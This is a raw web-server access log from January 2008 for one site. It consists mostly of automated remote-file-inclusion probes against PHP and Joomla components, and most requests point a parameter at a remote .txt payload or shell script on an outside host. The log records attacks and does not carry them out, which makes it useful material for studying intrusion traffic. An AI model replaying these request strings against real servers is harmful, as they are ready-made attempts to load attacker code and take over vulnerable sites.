200.206.143.90 - - [10/Jan/2008:17:20:47 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.15.59 - - [10/Jan/2008:17:21:54 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.246.15.59 - - [10/Jan/2008:17:21:54 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.155.109.117 - - [10/Jan/2008:17:23:53 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [10/Jan/2008:17:23:54 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:24:58 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:24:59 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:24:59 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:25:00 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:17:25:32 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.188.4 - - [10/Jan/2008:17:25:32 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.188.4 - - [10/Jan/2008:17:25:32 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:17:25:32 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.188.4 - - [10/Jan/2008:17:25:32 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [10/Jan/2008:17:25:32 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.188.4 - - [10/Jan/2008:17:25:35 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.188.4 - - [10/Jan/2008:17:25:35 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.188.4 - - [10/Jan/2008:17:25:36 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:25:47 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:25:47 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:25:47 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:25:48 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:25:48 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:25:48 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.135.220 - - [10/Jan/2008:17:25:57 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:06 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:06 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:06 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:07 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:07 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:08 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:09 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:09 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.249.98.41 - - [10/Jan/2008:17:26:09 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.245.20.148 - - [10/Jan/2008:17:26:42 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.171.242 - - [10/Jan/2008:17:27:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:17:27:56 -0800] "GET /?S=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:17:28:17 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:17:28:17 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:17:28:17 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:17:28:19 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:17:28:19 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.68.248 - - [10/Jan/2008:17:28:19 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:17:29:03 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:17:29:03 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.223.142 - - [10/Jan/2008:17:29:03 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:53 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:53 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:54 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:54 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:54 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:54 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:54 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:54 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:55 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:55 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:55 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.212.80.130 - - [10/Jan/2008:17:29:55 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.193.48 - - [10/Jan/2008:17:30:23 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:17:30:26 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.93.40.194 - - [10/Jan/2008:17:30:26 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://djitkai.com/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
202.155.109.117 - - [10/Jan/2008:17:31:31 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.155.109.117 - - [10/Jan/2008:17:31:31 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.160.16.3 - - [10/Jan/2008:17:34:11 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.160.16.3 - - [10/Jan/2008:17:34:12 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.98.99.250 - - [10/Jan/2008:17:34:14 -0800] "GET /logs/access_071229.log//convert/mvcw.php?step=1&vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [10/Jan/2008:17:34:15 -0800] "GET //convert/mvcw.php?step=1&vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.99.250 - - [10/Jan/2008:17:34:15 -0800] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:52 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:53 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:53 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:53 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.76.60.39 - - [10/Jan/2008:17:37:53 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/a.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.184.21 - - [10/Jan/2008:17:41:08 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [10/Jan/2008:17:41:09 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [10/Jan/2008:17:41:10 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.68.44.59 - - [10/Jan/2008:17:41:22 -0800] "GET /logs/access_071229.log///tools/send_reminders.php?noSet=0&includedir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.68.44.59 - - [10/Jan/2008:17:41:27 -0800] "GET ///tools/send_reminders.php?noSet=0&includedir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.68.44.59 - - [10/Jan/2008:17:41:32 -0800] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://www.catim.com/legislacao/.bht/r57.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.98.184.21 - - [10/Jan/2008:17:41:45 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [10/Jan/2008:17:41:46 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [10/Jan/2008:17:41:47 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.176.188.8 - - [10/Jan/2008:17:43:00 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.176.188.8 - - [10/Jan/2008:17:43:00 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://keesenmirjam.nl/media/mic22_mod.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.105 - - [10/Jan/2008:17:43:41 -0800] "GET /tmp/?N=D HTTP/1.0" 200 1657 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.180.216.12 - - [10/Jan/2008:17:45:35 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [10/Jan/2008:17:45:43 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.180.216.12 - - [10/Jan/2008:17:45:47 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.144 - - [10/Jan/2008:17:48:02 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.93.171.242 - - [10/Jan/2008:17:49:20 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.171.242 - - [10/Jan/2008:17:49:20 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.171.242 - - [10/Jan/2008:17:49:20 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.207.135.220 - - [10/Jan/2008:17:50:16 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.207.135.220 - - [10/Jan/2008:17:50:16 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.242.82 - - [10/Jan/2008:17:50:26 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.246.15.59 - - [10/Jan/2008:17:51:37 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.207.135.220 - - [10/Jan/2008:17:53:11 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.93.171.242 - - [10/Jan/2008:17:53:16 -0800] "GET /logs/access_071214.log/tools/send_reminders.php?noSet=0&includedir=http://www.sedafi.com.ar/mambots/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:17:54:02 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:27 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:27 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:27 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:48 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:48 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:49 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:50 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:50 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:54:50 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:17:56:38 -0800] "GET /logs/access_071229.log/tools/send_reminders.php?noSet=0&includedir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:17:56:38 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.92.236.83 - - [10/Jan/2008:17:56:38 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://daystarrecords.bizland.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:34 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:35 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:35 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:35 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:35 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:36 -0800] "GET /logs/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.34.1.65 - - [10/Jan/2008:17:58:51 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:52 -0800] "GET /logs/access_071225.log/index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.34.1.65 - - [10/Jan/2008:17:58:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.240.31.1 - - [10/Jan/2008:17:58:53 -0800] "GET /index.php?pag=http://www.laila.jp/item_pics/derf/ind0.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
